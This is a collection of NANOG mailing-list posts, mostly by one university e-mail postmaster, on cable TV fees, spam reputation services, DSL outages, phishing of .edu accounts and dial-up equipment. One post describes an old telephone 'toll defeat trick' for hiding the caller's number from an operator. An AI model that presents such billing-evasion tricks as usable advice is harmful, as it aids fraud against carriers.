While I agree that the broadcast networks are concerned about
unauthorized recording and/or rebroadcasting of the event, there's
also a precedent on a drone crashing during a high-profile sporting
event in the U.S.:

http://www.cnn.com/2015/09/04/us/us-open-tennis-drone-arrest/index.html

$.02,

- - ferg

RE: phone fun, was GeoIP database issues and the real world consequences

[Matthew Black]

One toll defeat trick that worked in GTE land in Southern California was to 
call the operator, then silently wait for them to hang up. Rattle the receiver 
hook several times for them to come back on the line and they would not know 
the caller's telephone number.



-Original Message-
From: NANOG [mailto:nanog-bounces+matthew.black=csulb@nanog.org] On Behalf 
Of Larry Sheldon
Sent: Tuesday, April 26, 2016 12:11 PM
To: nanog@nanog.org
Subject: Re: phone fun, was GeoIP database issues and the real world 
consequences



On 4/20/2016 10:15, Owen DeLong wrote:
>
>> On Apr 20, 2016, at 7:59 AM, Jean-Francois Mezei 
>>  wrote:
>>
>> On 2016-04-20 10:52, Owen DeLong wrote:
>>
>>> For the most part, “long distance” calls within the US are a thing of the
>>> past and at least one mobile carrier now treats US/CA/MX as a single
>>> local calling area
>>
>>
>> Is this a case of telcos having switched to IP trunks and can reach
>> other carriers for "free"
>>
>> Or are wholesale long distance still billed between carriers but at
>> prices so low that they can afford to offer "free" long distance at
>> retail level ?
>
> I think it boiled down to a recognition that the costs of billing were 
> beginning to account for something like $0.99 of every $1 billed.

I wonder if the costs of avoiding-preventing-investigating toll fraud 
final grow to consume the profit in the product.

I know that long ago there were things that I thought were insanely 
silly.  A few examples:

As an ordinary citizen I was amused and annoyed, in the case where a 
toll charge had been contested (and perforce refunded) there would often 
be several non-revenue calls to the protesting number asking whoever 
answered if they knew anybody in the called city, or if they knew who 
the called number belonged to.   (Proper answer in any case:  Who or 
what I know is none of your business.)  Often there would calls to the 
called number (super irritating because the error was in the 
recording--later learned to be poor handwriting) asking the reciprocal 
questions except that often they had no idea that a call had been made.

I  was a Toll Transmissionman for a number or years back in the last 
iceage and one of the onerous tasks the supervisor had was "verifying 
the phone bill" which might be a stack as much as six inches tall.  The 
evening shift supervisor (or one of them in a large office, like Los 
Angeles 1 Telegraph, where I worked for a while) would go through the 
bill, line by line, page by page, looking at the called number an d if 
he recognized it and placing a check mark next to it,  If he did not 
recognize it, he would search the many lists in the office to see it was 
shown, and adding a check mark if a list showed it for a likely sounding 
legal call.  If that didn't work he would probably have to call the 
number to see who answered (adding a wasted revenue-call path to the 
wreckage).  Most often it would turn out to be the home telephone number 
of a repair supervisor in West Sweatsock, Montana, who had been called 
because a somebody who protested the policy that the repairman going 
fishing meant some problem would not be addressed for several days.  So 
he put a check mark next to the number and moved on.

Which meant the number would show up on the next month's bill.  And it 
would again not be recognized from memory.  And so forth and so on. 
Until eventually, after several months, the number would be recognized, 
check-marked without drama, and disappear forever from the bill.

Lastly, in later years I was assigned to the the Revenue Accounting 
organization (to write programs for printing telephone books) and came 
to realize that there were a LOT of people in RA working with a LOT of 
people in the Chief Special Agents organization using a LOT of computer 
time to analyze Toll records for fraud patterns.

Oops, not quite lastly  Looking back at my Toll Plant days in the 
heyday of Captain Crunch--there were a lot engineering hours redesigning 
Toll equipment, and plant hours modifying or replacing equipment do 
defeat the engineering efforts of the Blue Box Boys.

-- 
"Everybody is a genius.  But if you judge a fish by
its ability to climb a tree, it will live its whole
life believing that it is stupid."

--Albert Einstein

RE: Broadcast television in an IP world

[Matthew Black]

Right now only 25% of cable subscribers watch sports channels like ESPN. But 
100% pay up to $20 a month for ESPN et al. in their monthly subscription fees. 
HBO and Showtime subscribers pay for those premium services. It is well past 
time for sports enthusiasts to pay for their very expensive content in a sports 
premium package.


-Original Message-
From: NANOG [mailto:nanog-boun...@nanog.org] On Behalf Of Luke Guillory
Sent: Friday, November 17, 2017 3:02 PM
To: Jean-Francois Mezei; nanog@nanog.org
Subject: RE: Broadcast television in an IP world

This use to be the case.

While it might lower OPX that surely won't result in lower retrans, will just 
be more profit for them.

We're down as well on video subs, this is 99% due to rising prices.

This is where it's heading for sure, in the end it will cost more as well since 
each will be charging more than the per sub rates we're getting charge. They'll 
have to in order to keep revenue the same.

When ESPN offers an OTT product I have no doubt it will be near the $20 per 
month, for 5 channels or so?



Luke Guillory
Vice President – Technology and Innovation

Tel:985.536.1212
Fax:985.536.0300
Email:  lguill...@reservetele.com

Reserve Telecommunications
100 RTC Dr
Reserve, LA 70084

_

Disclaimer:
The information transmitted, including attachments, is intended only for the 
person(s) or entity to which it is addressed and may contain confidential 
and/or privileged material which should not disseminate, distribute or be 
copied. Please notify Luke Guillory immediately by e-mail if you have received 
this e-mail by mistake and delete this e-mail from your system. E-mail 
transmission cannot be guaranteed to be secure or error-free as information 
could be intercepted, corrupted, lost, destroyed, arrive late or incomplete, or 
contain viruses. Luke Guillory therefore does not accept liability for any 
errors or omissions in the contents of this message, which arise as a result of 
e-mail transmission. .

RE: Broadcast television in an IP world

[Matthew Black]

I wrote ET AL. ESPN costs $9 per month. Throw in Fox Sports and other regional 
sports franchise fees to get $20 a month. And then ESPN double dips by airing 
advertising. HBO and Showtime are commercial free.

http://www.businessinsider.com/cable-satellite-tv-sub-fees-espn-networks-2017-3



-Original Message-
From: Luke Guillory [mailto:lguill...@reservetele.com] 
Sent: Monday, November 20, 2017 8:10 AM
To: Matthew Black; nanog@nanog.org
Subject: RE: Broadcast television in an IP world

ESPN's programing fees aren't anywhere near $20 a month, they're not even $10 a 
month. HBO on the other hand is pretty much what the end user pays in terms of 
programing cost. 



-Original Message-
From: Matthew Black [mailto:matthew.bl...@csulb.edu] 
Sent: Monday, November 20, 2017 9:11 AM
To: Luke Guillory; nanog@nanog.org
Subject: RE: Broadcast television in an IP world

Right now only 25% of cable subscribers watch sports channels like ESPN. But 
100% pay up to $20 a month for ESPN et al. in their monthly subscription fees. 
HBO and Showtime subscribers pay for those premium services. It is well past 
time for sports enthusiasts to pay for their very expensive content in a sports 
premium package.


-Original Message-
From: NANOG [mailto:nanog-boun...@nanog.org] On Behalf Of Luke Guillory
Sent: Friday, November 17, 2017 3:02 PM
To: Jean-Francois Mezei; nanog@nanog.org
Subject: RE: Broadcast television in an IP world

This use to be the case.

While it might lower OPX that surely won't result in lower retrans, will just 
be more profit for them.

We're down as well on video subs, this is 99% due to rising prices.

This is where it's heading for sure, in the end it will cost more as well since 
each will be charging more than the per sub rates we're getting charge. They'll 
have to in order to keep revenue the same.

When ESPN offers an OTT product I have no doubt it will be near the $20 per 
month, for 5 channels or so?



Luke Guillory
Vice President – Technology and Innovation

Tel:985.536.1212
Fax:985.536.0300
Email:  lguill...@reservetele.com

Reserve Telecommunications
100 RTC Dr
Reserve, LA 70084

_

Disclaimer:
The information transmitted, including attachments, is intended only for the 
person(s) or entity to which it is addressed and may contain confidential 
and/or privileged material which should not disseminate, distribute or be 
copied. Please notify Luke Guillory immediately by e-mail if you have received 
this e-mail by mistake and delete this e-mail from your system. E-mail 
transmission cannot be guaranteed to be secure or error-free as information 
could be intercepted, corrupted, lost, destroyed, arrive late or incomplete, or 
contain viruses. Luke Guillory therefore does not accept liability for any 
errors or omissions in the contents of this message, which arise as a result of 
e-mail transmission. .

RE: Broadcast television in an IP world

[Matthew Black]

No problem, and thanks for the apology. Cable TV bills get most of us heated. 
100% ala carte pricing may not be the solution, but the current model is pretty 
cruel to subscribers who aren't sports fans. It's likely that a premium sports 
package may have to charge upwards of $50-100 per month since they can no 
longer charge everyone. ESPN subscriber fees have skyrocketed because they can 
get away with charging more, just like HBO. The cable TV industry should be 
much more transparent about costs.


-Original Message-
From: Luke Guillory [mailto:lguill...@reservetele.com] 
Sent: Monday, November 20, 2017 8:40 AM
To: Matthew Black; nanog@nanog.org
Subject: RE: Broadcast television in an IP world

I missed the et al, sorry about that. 



-Original Message-----
From: Matthew Black [mailto:matthew.bl...@csulb.edu] 
Sent: Monday, November 20, 2017 10:30 AM
To: Luke Guillory; nanog@nanog.org
Subject: RE: Broadcast television in an IP world

I wrote ET AL. ESPN costs $9 per month. Throw in Fox Sports and other regional 
sports franchise fees to get $20 a month. And then ESPN double dips by airing 
advertising. HBO and Showtime are commercial free.

http://www.businessinsider.com/cable-satellite-tv-sub-fees-espn-networks-2017-3



-Original Message-
From: Luke Guillory [mailto:lguill...@reservetele.com] 
Sent: Monday, November 20, 2017 8:10 AM
To: Matthew Black; nanog@nanog.org
Subject: RE: Broadcast television in an IP world

ESPN's programing fees aren't anywhere near $20 a month, they're not even $10 a 
month. HBO on the other hand is pretty much what the end user pays in terms of 
programing cost. 



-Original Message-
From: Matthew Black [mailto:matthew.bl...@csulb.edu] 
Sent: Monday, November 20, 2017 9:11 AM
To: Luke Guillory; nanog@nanog.org
Subject: RE: Broadcast television in an IP world

Right now only 25% of cable subscribers watch sports channels like ESPN. But 
100% pay up to $20 a month for ESPN et al. in their monthly subscription fees. 
HBO and Showtime subscribers pay for those premium services. It is well past 
time for sports enthusiasts to pay for their very expensive content in a sports 
premium package.


-Original Message-
From: NANOG [mailto:nanog-boun...@nanog.org] On Behalf Of Luke Guillory
Sent: Friday, November 17, 2017 3:02 PM
To: Jean-Francois Mezei; nanog@nanog.org
Subject: RE: Broadcast television in an IP world

This use to be the case.

While it might lower OPX that surely won't result in lower retrans, will just 
be more profit for them.

We're down as well on video subs, this is 99% due to rising prices.

This is where it's heading for sure, in the end it will cost more as well since 
each will be charging more than the per sub rates we're getting charge. They'll 
have to in order to keep revenue the same.

When ESPN offers an OTT product I have no doubt it will be near the $20 per 
month, for 5 channels or so?



Luke Guillory
Vice President – Technology and Innovation

Tel:985.536.1212
Fax:985.536.0300
Email:  lguill...@reservetele.com

Reserve Telecommunications
100 RTC Dr
Reserve, LA 70084

_

Disclaimer:
The information transmitted, including attachments, is intended only for the 
person(s) or entity to which it is addressed and may contain confidential 
and/or privileged material which should not disseminate, distribute or be 
copied. Please notify Luke Guillory immediately by e-mail if you have received 
this e-mail by mistake and delete this e-mail from your system. E-mail 
transmission cannot be guaranteed to be secure or error-free as information 
could be intercepted, corrupted, lost, destroyed, arrive late or incomplete, or 
contain viruses. Luke Guillory therefore does not accept liability for any 
errors or omissions in the contents of this message, which arise as a result of 
e-mail transmission. .

Facebook Issues/Outage ... what about Yahoo! Answers

[Matthew Black]

I didn't have trouble with Facebook, but the last two evenings Yahoo! 
Answers [http://answers.yahoo.com] seems 99.47% unresponsive. Verizon DSL 
customer.



matthew black
e-mail postmaster
california state university, long beach

Re: Mastercard problems

[Matthew Black]

O> - Original Message -

From:James Downs 
To:andrew.wallace 
Cc:Christopher Morrow ; "nanog@nanog.org" 


Sent:Wednesday, 8 December 2010, 21:30:20
Subject:Re: Mastercard problems

[snip]
Yikes.. you consider a private company's business to be the financial and 
payment system of the United States?



Yes, I do. Especially when government agencies accept payments through 
MasterCard, et al.



matthew black
comments reflect my opinions and may not represent those of my employer.

Re: Wacky Weekend: NERC to relax power grid frequency strictures

[Matthew Black]

On Fri, 24 Jun 2011 18:29:14 -0400
 Jay Ashworth  wrote:

The North American Electric Reliability Council is planning to relax
the standards for how closely power utilities must hold to 60.00Hz.

Here's my absolute favorite quote of all time:

 Tweaking the power grid's frequency is expensive and takes a lot of 
effort, 
 said Joe McClelland, head of electric reliability for the Federal Energy 
 Regulatory Commission.



I blinked too after hearing of this. They say it's an economic issue because 
it costs millions of dollars to maintain a steady frequency. Excuse me...we 
probably spend over $50 billion per year on electricity and they're 
complaining about a few million. Talk about pinching pennies!


matthew black
e-mail postmaster
california state university, long beach

Re: 3Com Total Control documentation

[Matthew Black]

My sympathies to your unfortunate situation. The last tech probably doesn't 
want to be bothered...that's a management issue. A PortMaster 3 may solve 
your problems.


I looked at 3Com Total Control about 15 years ago but know nothing about it. 
We employed US Robotics rack-mount chassis paired with Xyplex terminal 
servers. That was replaced with the Livingston PortMaster 3 (later bought by 
Lucent). Each PortMaster 3 connects to two T1 lines and a 10BaseT Ethernet, 
supporting 48 users. Use RADIUS authentication and you're all set.


You can probably pick up some of those for a hundred dollars.

You will need to learn about T1 phone lines and RADIUS.

Best regards,

matthew black
california state university, long beach


On Tue, 26 Jul 2011 19:35:35 -0700
 Hector Herrera  wrote:

Hi,

I have "inherited" several 3Com Total Control racks that are used to
provide dial-up service to rural areas.

The racks have been running in auto-pilot for several years now and
the last tech's comments with regard to the racks was along the lines
of "I don't know".

I would like to regain control over the network as recently the
outages are becoming more frequent and extended and we don't usually
know about it until customers call the support line a week later.

Decommissioning the racks is not currently an option as there are no
other reasonable alternatives for internet service (other than
satellite).  The ISP being an marginal area provider is also short in
funds.

I'm having a hard time finding documentation, firmware updates or
support for these racks.

As far as I can tell, the current owner of the product line is
UTStarCom in China, but their website does not make any reference to
the product.

I also found a company that sells the equipment and provides support
contracts, WRCA, but their pricing is out of the budget range for the
ISP.

I am hoping that some of you who used to work with this equipment may
still have documentation CDs or firmware updates stored away
somewhere.

I'm looking for any documentation, firmware updates and some help
figuring out which NAC goes with which NIC.

Or perhaps you can suggest other companies that provide support for
the equipment at more reasonable rates.

I would be willing to setup a public repository to help other admins.

Thanks,

--
Hector Herrera

Re: 3Com Total Control documentation

[Matthew Black]

By the way, a simple Google search of "3Com Total Control" yields this as 
the first result:


http://www.brianpinon.com/brian/assets/PDFs/3Com/ARCGSG.pdf

matthew



On Thu, 28 Jul 2011 08:19:11 -0700
 Matthew Black  wrote:
My sympathies to your unfortunate situation. The last tech probably 
doesn't want to be bothered...that's a management issue. A PortMaster 3 may 
solve your problems.


I looked at 3Com Total Control about 15 years ago but know nothing about 
it. We employed US Robotics rack-mount chassis paired with Xyplex terminal 
servers. That was replaced with the Livingston PortMaster 3 (later bought 
by Lucent). Each PortMaster 3 connects to two T1 lines and a 10BaseT 
Ethernet, supporting 48 users. Use RADIUS authentication and you're all 
set.


You can probably pick up some of those for a hundred dollars.

You will need to learn about T1 phone lines and RADIUS.

Best regards,

matthew black
california state university, long beach


On Tue, 26 Jul 2011 19:35:35 -0700
 Hector Herrera  wrote:

Hi,

I have "inherited" several 3Com Total Control racks that are used to
provide dial-up service to rural areas.

The racks have been running in auto-pilot for several years now and
the last tech's comments with regard to the racks was along the lines
of "I don't know".

I would like to regain control over the network as recently the
outages are becoming more frequent and extended and we don't usually
know about it until customers call the support line a week later.

Decommissioning the racks is not currently an option as there are no
other reasonable alternatives for internet service (other than
satellite).  The ISP being an marginal area provider is also short in
funds.

I'm having a hard time finding documentation, firmware updates or
support for these racks.

As far as I can tell, the current owner of the product line is
UTStarCom in China, but their website does not make any reference to
the product.

I also found a company that sells the equipment and provides support
contracts, WRCA, but their pricing is out of the budget range for the
ISP.

I am hoping that some of you who used to work with this equipment may
still have documentation CDs or firmware updates stored away
somewhere.

I'm looking for any documentation, firmware updates and some help
figuring out which NAC goes with which NIC.

Or perhaps you can suggest other companies that provide support for
the equipment at more reasonable rates.

I would be willing to setup a public repository to help other admins.

Thanks,

--
Hector Herrera

Re: Spamhaus...

[Matthew Black]

On Wed, 17 Feb 2010 17:32:51 -0500
 "Laczo, Louis"  wrote:

Folks,

I'm looking for comments / suggestions / opinions from any providers that 
have been contacted by spamhaus about excessive queries originating from 
their DNS resolvers, typically, as a proxy for customers. I know that 
certain large DNS providers (i.e. google and level3) have either been 
banned or have voluntarily blocked spamhaus queries by their resolvers. 
We're currently in discussion with spamhaus and I wanted to see how others 
may have handled this.


Thanks!
--Lou



When we licensed Spamhaus a few years back, they required us to set-up a DNS 
slave server instead of querying against their public server. They had a 
special DNS client that allowed partial zone updates. Turns out we 
downloaded huge hourly updates.


We no longer use Spamhaus, relying instead upon Sender Base Reputation 
Scores (IronPort).


matthew black
e-mail postmaster
california state university, long beach

Re: Spamhaus ...

[Matthew Black]

On Wed, 17 Feb 2010 18:33:00 -0700
 Joel M Snyder  wrote:
I second the assertion that others have already made that this is worth 
the money.  We do spam testing, and I can more-or-less guarantee that 
Spamhaus beats all of the free reputation services (and a number of the 
for-pay ones) hands-down in its ability to block spam and the incredibly 
low number of false positives.


We ADDED Spamhaus to our IronPort because it was inexpensive. I recall using 
MAPS RBL many years earlier with a lot of false positives and angry 
companies trying to reach our users.


 

John Levine wrote:

> > We no longer use Spamhaus, relying instead upon Sender Base Reputation
> >Scores (IronPort).

>How does the price compare?

Well, depending on how you look at it, either horribly or beautifully. You 
can't buy SenderBase by itself; you get it with an Ironport anti-spam 
appliance.  So if you were going to buy Ironport anyway, the price is 
"free" which makes it cheaper than Spamhaus.  On the other hand, if you 
just want SenderBase, it'd be a very expensive way to get only the 
reputation filtering.


In general, like many of the big-name anti-spam products, the reputation 
service is part-and-parcel of the product and can't really be separated 
out.  In fact, with Ironport, they use the reputation service in two ways: 
one is to block connections in the first place, and the second way is to 
bias results of their content filter for connections which are accepted. 
Since their scores are -10 to +10, there's considerable leeway to use the 
information as part of their anti-spam cocktail beyond simple "go/no-go" of 
a typical reputation service.


jms
Joel M Snyder, 1404 East Lind Road, Tucson, AZ, 85719



SenderBase blocks about 90% of incoming connections. 3-part TCP/IP 
handshake, send them an error, then disconnect. For some egregious senders, 
we simply refuse the TCP/IP connection. You don't have to scan refused 
messages or connections for viruses or spam, a very costly process.


When IronPort first released their own anti-spam product to replace 
Brightmail, it had many false positives. We were a beta tester. They do much 
better now and false positives are almost non-existent.


We still encounter the occasional user wondering why their connection gets 
blocked by SenderBase. For our users, we remind them to configure SMTP AUTH 
when working from off campus because so many DSL addesses have low SBRS 
values. SMTP AUTH lets them bypass the SenderBase.


One of the coolest IronPort features is virtual gateways. Besides all the 
reputation filtering and anti-spam, anti-virus features, IronPort lets you 
create virtual gateways so outbound e-mail can be classed to use a different 
outbound source IP address. Very helpful so that our bulk mailers don't 
affect individual users should we get black or graylisted.


Cheers.

matthew black
e-mail postmaster
california state university, long beach

Possible outage in Camarillo, CA USA

[Matthew Black]

A colleague reports that Verizon and ATT have a cut cable in Camarillo, CA, 
in the vacinity of Lewis Road and Dawson. Anyone have more information on 
this outage? Thanks.


matthew black
e-mail postmaster
california state university, long beach

Re: Does Internet Speed Vary by Season?

[Matthew Black]

On Wed, 7 Oct 2009 23:12:44 +0800
 Adrian Chadd  wrote:

Please don't forget moisture content. DSL speeds may drop during
wet winters because cable pits fill with water. :)

Those with real statistics, please stand up. I know ISPs who run
large DSL infrastructures have these stats. I've even seen them
at conferences. :)


Adrian



Me! During the rainy season of recent past years, the cable vault in front 
of my home would flood, thereby degrading or completely hosing DSL service. 
Haven't had heavy rains for a couple years so no trouble.


I had to replace my DSL modem about 6 months ago because the previous 
Westell Wirespeed modem had died very slowly. My speed went from 1.5M to 
less than 200k and was flaky. The new modem gives me a clean 3M/768k 
connection. Not bad for DSL ($35/month). But that wasn't weather related. 
Verizon.


matthew black
california state university, long beach

Advice requested

[Matthew Black]

What would you do if a major US computer security firm
attempted to hack your site's servers and networks?
Would you tell the company or let their experts figure
it out?

matthew black
network services
california state university, long beach

[Nanog] NANOG list changes

[Matthew Black]

OK, looks like they changed servers recently. I haven't
been following the list for a few months. They also
changed the message headers and they no longer include
the Sender: header that my filter uses on incoming e-mail.

Sender: [EMAIL PROTECTED]

matthew black
network services
california state university, long beach
1250 bellflower boulevard
long beach, ca 90840-0101



On Fri, 18 Apr 2008 12:00:02 +
  [EMAIL PROTECTED] wrote:
> Welcome to the NANOG@nanog.org mailing list!
> 
> To post to this list, send your email to:
> 
>  nanog@nanog.org
> 
> General information about the mailing list is at:
[...snip]

___
NANOG mailing list
NANOG@nanog.org
http://mailman.nanog.org/mailman/listinfo/nanog

Re: Fake-alert: VERIFY YOUR MERIT.EDU WEBMAIL ACCOUNT

[Matthew Black]

On Sat, 24 May 2008 17:14:33 +0100
 Graeme Fowler <[EMAIL PROTECTED]> wrote:

On Sat, 2008-05-24 at 17:02 +0200, Peter Dambier wrote:

I dont trust it:


Quite right too, it's a spear-phishing attack. This is currently an
almost daily occurrence for .edu domains.

The compromised accounts are frequently abused via webmail systems,
being used to send out more scams.

The scammers responsible are also targeting UK higher ed institutions,
with a limited degree of success. I can't really speak for my US
counterparts with regards the success of the attacks, but one would
surmise that it's more or less the same. To paraphrase badly:

All users are gullible, but some are more gullible than others.

-g



As a US EDU, I can attest to the fact that a handful of
our webmail accounts have been compromised and subsequently
used to send out these types of phishing attacks. We never
figured out how the accounts were compromised. I suspect
users with hand-held devices are being snooped when they
use IMAP. Our webmail is SSL, but not IMAP.

Most of the spammers' messages appear as though someone
is manually using their cut & paste to generate the spam,
not anything automated (based on the rate messages go out.
Seems rather tedious.


matthew black
e-mail postmaster
network services
california state university, long beach

Re: Spamhaus down?

[Matthew Black]

On Fri, 13 Jun 2008 08:02:58 +
 Steve Linford <[EMAIL PROTECTED]> wrote:

On 12 Jun 2008, at 20:55, Raymond L. Corbin wrote:


Something going on with SpamHaus site/ dnsbl servers?



We get a spamhaus data feed of PBL, SBL, and XBL
and have not seen any problems recently.

matthew black
california state university, long beach

Re: Cache Poisoning Detection via ONZRA's CacheAudit

[Matthew Black]

On Fri, 1 Aug 2008 13:20:45 -0700
 Jose Avila <[EMAIL PROTECTED]> wrote:
In light of new attack vectors DNS Cache Poisoning discovered by Dan 
Kaminsky, ONZRA has developed a free Open Source (BSD License) tool 
called CacheAudit. This tool allows recursive providers to detect  cache 
poisoning events using cache dumps from their DNS servers. Along  with 
releasing this tool, ONZRA has also released a white paper  describing the 
validation process.


Main Tool Page: http://www.onzra.com/cacheaudit.html
White Paper: http://www.onzra.com/RecursiveDNSCacheAuditingWhitepaper.pdf





Main Tool Page: http://www.onzra.com/cacheaudit.html


LOL. Now that's funny! I get a completely black screen
with Firefox and IE. I briefly glanced at the HTML src
code (CTRL-U) but don't want to burn brain cells figuring
out what you have to say.

matthew black
network services
california state university, long beach

Re: [funsec] McColo: Major Source of Online Scams andSpams KnockedOffline (fwd)

[Matthew Black]

Since McColo, et al., cutting off those miscreant customers
on Wednesday, I've noticed a huge decline in connection
attempts to our e-mail gateways. Even if their efforts are
temporary, the change is quite noticeable.

matthew black
e-mail postmaster
california state university, long beach

Re: No route to verizon

[Matthew Black]

On Mon, 15 Dec 2008 15:05:44 -0400
 "Sharlon R. Carty"  wrote:

Hello,

This is my first post. 


Can anyone provide some info or Verizon why there is no connectivity to
Verizon CA(Verizon Business UUNETCA8-A)? 
Can not reach the following net range: 66.48.66.160 - 66.48.66.175


My traceroute also ends with ALTER.NET:
traceroute to 66.48.66.160 (66.48.66.160), 30 hops max, 40 byte packets
...
 7  los-edge-01.inet.qwest.net (63.147.28.181)  1.701 ms  1.870 ms  1.734 
ms
 8  los-core-01.inet.qwest.net (205.171.32.33)  1.755 ms  1.670 ms  1.823 
ms
 9  lap-brdr-01.inet.qwest.net (205.171.32.10)  1.722 ms  2.082 ms  2.676 
ms
10  0.so-4-3-0.BR1.LAX7.ALTER.NET (204.255.169.193)  2.094 ms  2.046 ms 
1.720 ms



matthew black
e-mail postmaster
california state university, long beach

What to do when your ISP off-shores tech support

[Matthew Black]

I've had difficulties reaching anyone with a brain
at my DSL provider Verizon California.

I can reliably ping the first hop from my home to
the CO with a 25ms delay. But if I ping any other
location, packets get dropped or significantly
delayed. To me, this sounds like Verizon has an
internal routing problem rather than a problem
with my phone line. Note that it rained recently
in our area and the cable vault in front of my
is usually covered with stagnant water because
the gutters don't drain it away.

I have tried to explain this to tech support but
they refuse to go off script, even the supervisors.
They keep insisting on sending a tech to my home
when I suggest this should be escalated to their
network operations team.

Anyhow, if I can reliably ping the first hop
from my home, would that eliminate my telephone
connection as part of the problem? Just a sanity
check on my part. Thanks.

matthew black
california state university, long beach

Re: What to do when your ISP off-shores tech support

[Matthew Black]

On Wed, 24 Dec 2008 09:51:41 -0800
 "Tomas L. Byrnes"  wrote:

Cox Communications has fully on-shore support. Here in SD they are
actually LOCAL.

Their TS staff are responsive and courteous. I only wish their network
were more reliable. (They're better than SBC in my experience, however.)



In Verizon land, residential customers do not have
CLEC voice or DSL alternatives. We do not have Cox.
Our area is served by Charter Communications who has
the broadband cable monopoly. Verizon has the fiber
monopoly with their FIOS. AT&T fiber is not possible
in Verizon land. Nobody competes against Verizon for
residential service in Southern California. However,
Charter cable customers can get dial tone and data
services.

matthew black
e-mail postmaster

bargaining unit 9 representative
csueu chapter 315

network services BH-188
california state university, long beach
1250 bellflower boulevard
long beach, ca  90840-0101

work phone: 562-985-5144

Re: What to do when your ISP off-shores tech support

[Matthew Black]

On Wed, 24 Dec 2008 10:10:33 -0800
 Etaoin Shrdlu  wrote:

Matthew Black wrote:


On Wed, 24 Dec 2008 09:51:41 -0800
 "Tomas L. Byrnes"  wrote:


Cox Communications has fully on-shore support. Here in SD they are
actually LOCAL.



In Verizon land, residential customers do not have
CLEC voice or DSL alternatives. We do not have Cox.
Our area is served by Charter Communications who has
the broadband cable monopoly. Verizon has the fiber
monopoly with their FIOS. AT&T fiber is not possible
in Verizon land. Nobody competes against Verizon for
residential service in Southern California.


Sir, both COVAD and DSLExtreme beg to differ. Seriously. I just checked.

--
The histories of mankind are histories only of the higher classes.

Thomas Malthus



Going through COVAD's interactive DSL chooser,
there are no options for RESIDENTIAL service.

<http://covad.com/web/index.html>


DSLextreme is charging a higher price than Verizon
and I suspect they are simply reselling Verizon's
DSL rather than connecting my copper to their
network. That's hardly what I consider CLEC service.
I could be wrong and would switch if I could. But I
don't see them offering voice and that's why I conclude
they are reselling Verizon's DSL service.

matthew black
california state university, long beach

Re: What to do when your ISP off-shores tech support

[Matthew Black]

On Sat, 27 Dec 2008 11:53:18 +
 Martin List-Petersen  wrote:


The problem is, and this was stated by the original poster, that the
lads off-shore he deals with have no clue and simply stick to the
script. No intention of looking what the real problem is. And that
problem lies not in the call center. It is the deal, that $TELCO struck
with $CALLCENTER and the procedures, that were put in place, that are
the problem.

Only solution: find a provider, who's support (off-shore or not) does
have a clue, has an escalation process and is willing to find a solution.



How does one find such a provider? I'm unaware of any company
that lets potential customers test drive their $SERVICE call center
before purchase. Even if one did, how is a potential customer
supposed to evaluate the competence of said call center when
customer has no clue as to what problems may arise 5 years after
purchase of provider's service, whether said test drive provided
an accurate and appropriate solution, and whether said call center
quality will exist 5 years after purchase of the service.

matthew black
long beach, ca

Re: Minnesota to block online gambling sites?

[Matthew Black]

Instead of huffing and puffing your libertarian perspective (you called the 
AG's letter garbage), you might make a quick Google search of 
"18USC1084(d)," which provides a wealth of information on the legality of 
such enforcement actions.


http://openjurist.org/325/f2d/148

Excerpted from the court decision:

18 U.S.C. 1084(d). 'When any common carrier, subject to the jurisdiction of 
the Federal Communications Commission, is notified in writing by a Federal, 
State, or local law enforcement agency, acting within its jurisdiction, that 
any facility furnished by it is being used or will be used for the purpose 
of transmitting or receiving gambling information in interstate or foreign 
commerce in violation of Federal, State or local law, it shall discontinue 
or refuse, the leasing, furnishing, or maintaining of such facility, after 
reasonable notice to the subscriber, but no damages, penalty or forfeiture, 
civil or criminal, shall be found against any common carrier for any act 
done in compliance with any notice received from a law enforcement agency. 
Nothing in this section shall be deemed to prejudice the right of any person 
affected thereby to secure an appropriate determination, as otherwise 
provided by law, in a Federal court or in a State or local tribunal or 
agency, that such facility should not be discontinued or removed, or should 
be restored.'



matthew black
speaking only for myself and not my employer
california state university, long beach



On Sat, 2 May 2009 09:39:02 -0400
 Jeffrey Lyon  wrote:

What a pile of garbage. I would definitely get a legal review of a
request like that before blocking any of my customer's traffic.


--
Jeffrey Lyon, Leadership Team
jeffrey.l...@blacklotus.net | http://www.blacklotus.net
Black Lotus Communications of The IRC Company, Inc.

Look for us at HostingCon 2009 in Washington, DC on August 10th - 12th
at Booth #401.



On Sat, May 2, 2009 at 9:34 AM, Ken Gilmour  wrote:
For anyone who cares, IMEGA released the letter from the state of 
Minnesota:


http://www.imega.org/wp-content/uploads/2009/05/ab001dd4.pdf

2009/4/29 Ken Gilmour :

Hi there,

I am just wondering if anyone knows any more about the attempt by
Minnesota to block online gambling companies other than what's
publicly available (e.g.
http://www.gambling911.com/gambling-news/minnesota-regulators-try-block-access-gambing-sites-042909.html)?
Such as a list or the letter to the providers?

Thank you!

Ken